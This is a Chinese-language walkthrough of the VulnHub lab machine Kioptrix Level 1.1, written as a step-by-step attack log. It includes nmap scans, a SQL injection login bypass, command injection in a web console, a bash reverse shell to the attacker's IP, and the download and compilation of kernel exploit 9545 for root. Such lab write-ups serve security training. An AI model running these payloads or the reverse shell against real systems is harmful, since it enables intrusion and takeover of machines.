猫宁~~~
地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
重点关注工具使用和测试思路。
kali linux攻击机 192.168.100.4
nmap 192.168.100.0/24
发现靶机
kioptr靶机IP 192.168.100.9
nmap -sV -p1-65535 192.168.100.9
获取指纹信息:
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
666/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
访问http://192.168.100.9/,显示登录框
用户名:admin' or '1'='1-- 密码:123456
通过万能密码直接登录成功。
显示Welcome to the Basic Administrative Web Console
输入0 && whoami,得知服务权限apache
输入;bash -i >& /dev/tcp/192.168.100.4/6666 0>&1执行
kali linux上nc -lvnp 6666,获取权限
uname -a,查看版本
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
可以提权。
searchsploit 9545
/usr/share/exploitdb/exploits/linux/local/9545.c
地址:https://www.exploit-db.com/exploits/9545
cp /usr/share/exploitdb/exploits/linux/local/9545.c /root/9545.c
python -m SimpleHTTPServer 80
靶机cd /tmp并wget http://192.168.100.6/9545.c
靶机gcc -o muma 9545.c
靶机执行./muma,顺利实现提权。
bash-3.00$变为sh-3.00$,root权限。